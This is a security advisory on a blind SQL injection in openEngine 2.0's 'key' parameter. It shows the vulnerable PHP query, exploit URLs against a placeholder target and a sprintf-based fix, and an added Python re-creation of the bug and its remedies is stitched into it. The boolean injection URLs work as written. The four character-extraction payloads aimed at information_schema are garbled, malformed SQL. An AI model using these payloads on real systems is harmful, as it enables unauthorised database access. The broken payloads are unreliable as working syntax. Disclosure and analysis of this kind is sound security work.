SSCHADV2011-026 - openEngine 2.0 'key' Blind SQL Injection vulnerability
Advisory: openEngine 2.0 'key' Blind SQL Injection vulnerability
Advisory ID: SSCHADV2011-026
Author: Stefan Schurtz
Affected Software: Successfully tested on openEngine 2.0 100226
Vendor URL:
Vendor Status: informed
CVE-ID: -
======================
Vulnerability Description
======================
The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection vulnerability.
==============
Technical Details
==============
# vulnerable code in 'openengine/cms/system/02_page/includes/admin.php'
# $page_key is placed into the statement unquoted and unvalidated
$query = "SELECT * FROM ".$db_praefix."page WHERE (page_key = $page_key) AND (page_status <= ".$account_status.") $access";
==============
Exploit
==============
Database information
User: easy
Blind SQL Injection
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie möchten die Seite versenden."
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie möchten die Seite Homepage (de) versenden."
User-Guessing
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD,CHAR)) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121
=====
Solution
=====
$query = sprintf("SELECT * FROM ".$db_praefix."page WHERE (page_key = %d) AND (page_status <= ".$account_status.") $access;",$page_key);
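The following is an added example, not code from the advisory or from openEngine: a Python re-creation of the vulnerable admin.php statement and of the sprintf('%d') fix, run against an in-memory SQLite table standing in for the MySQL "page" table. The table layout, the $account_status and $access values, and the php_int() emulation of PHP's %d conversion are assumptions; the bound-parameter variant goes beyond the advisory's fix and is included to show the general remedy.

```python
import re
import sqlite3

# Constructed stand-ins for the advisory's PHP variables (assumed values).
DB_PREFIX = "oe_"      # plays the role of $db_praefix
ACCOUNT_STATUS = 1     # plays the role of $account_status
ACCESS = ""            # plays the role of $access (assumed empty here)


def make_db():
    # Constructed sample "page" table with one row; SQLite replaces MySQL.
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {DB_PREFIX}page "
                 "(page_key INTEGER, page_title TEXT, page_status INTEGER)")
    conn.execute(f"INSERT INTO {DB_PREFIX}page VALUES (1, 'Homepage (de)', 0)")
    return conn


def vulnerable_query(conn, page_key):
    # Mirrors the advisory's vulnerable line: page_key interpolated unquoted,
    # so "-1 OR 1=1" becomes part of the WHERE clause and flips the result.
    sql = (f"SELECT * FROM {DB_PREFIX}page WHERE (page_key = {page_key}) "
           f"AND (page_status <= {ACCOUNT_STATUS}) {ACCESS}")
    return conn.execute(sql).fetchall()


def php_int(value):
    # Emulates PHP sprintf('%d', $s): leading integer of the string, else 0.
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def fixed_query_sprintf(conn, page_key):
    # The advisory's fix: %d forces page_key to an integer before it
    # reaches the SQL, so the injected tail is discarded.
    sql = (f"SELECT * FROM {DB_PREFIX}page WHERE (page_key = {php_int(page_key)}) "
           f"AND (page_status <= {ACCOUNT_STATUS}) {ACCESS}")
    return conn.execute(sql).fetchall()


def fixed_query_param(conn, page_key):
    # General remedy (beyond the advisory): bind the value as a parameter,
    # which also protects columns that are not numeric.
    sql = (f"SELECT * FROM {DB_PREFIX}page WHERE (page_key = ?) "
           f"AND (page_status <= {ACCOUNT_STATUS}) {ACCESS}")
    return conn.execute(sql, (page_key,)).fetchall()
```

The two vulnerable_query calls reproduce the advisory's boolean test (no row for "-1 OR 1=2", one row for "-1 OR 1=1"), which is the observable difference behind the two page texts quoted above; both fixed variants return no row for either input.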
================
Disclosure Timeline
================
08-Oct-2011 – informed developers
08-Oct-2011 – release date of this security advisory
09-Oct-2011 – post on BugTraq
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.openengine.de/